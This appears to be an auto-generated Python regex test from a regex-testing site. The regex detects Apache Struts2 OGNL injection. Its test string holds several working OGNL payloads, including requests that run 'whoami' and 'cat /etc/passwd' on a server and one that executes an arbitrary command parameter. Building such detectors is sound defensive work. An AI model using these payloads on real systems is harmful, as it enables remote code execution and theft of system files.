# coding=utf8
# the above tag defines encoding for this document and is for Python 2.x compatibility
import re
regex = r"\%[\s|\\r|\\n]*\{[\s|\\r|\\n]*(?:[\s|\\r|\\n]*\(\#[^\=]+\=[^\)]+\)\.)"
test_str = ("\"Cache-Control\": \"max-age=0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8\", \"Connection\": \"close\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\"}\n"
" data = \"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\n"
"Content-Disposition: form-data; name=\\\"id\\\"\n\n"
"%{\n"
"(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n"
"(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n"
"(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n"
"(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n"
"(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n"
"(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n"
"(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n"
"(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n"
"(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'whoami'}))\n"
"}\n"
"------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\"\n\n\n\n"
"/?name=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\n\n\n\n"
" /index.action?method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#s=new java.util.Scanner(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()).useDelimiter(#parameters.pp[0]),#str=#s.hasNext()?#s.next():#parameters.ppp[0],#w.print(#str),#w.close(),1?#xx:#request.toString&pp=\\\\A&ppp= &encoding=UTF-8&cmd=cat /etc/passwd\n\n\n\n"
" ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n%{\\r\\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\\r\\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\\r\\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\\r\\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\\r\\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\\r\\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\\r\\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\\r\\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\\r\\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'CMD'}))\\r\\n}\\r\\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\\xe2\\x80\\x94\n")
matches = re.finditer(regex, test_str, re.IGNORECASE)
for matchNum, match in enumerate(matches, start=1):
print ("Match {matchNum} was found at {start}-{end}: {match}".format(matchNum = matchNum, start = match.start(), end = match.end(), match = match.group()))
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
print ("Group {groupNum} found at {start}-{end}: {group}".format(groupNum = groupNum, start = match.start(groupNum), end = match.end(groupNum), group = match.group(groupNum)))
# Note: for Python 2.7 compatibility, use ur"" to prefix the regex and u"" to prefix the test string and substitution.
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for Python, please visit: https://docs.python.org/3/library/re.html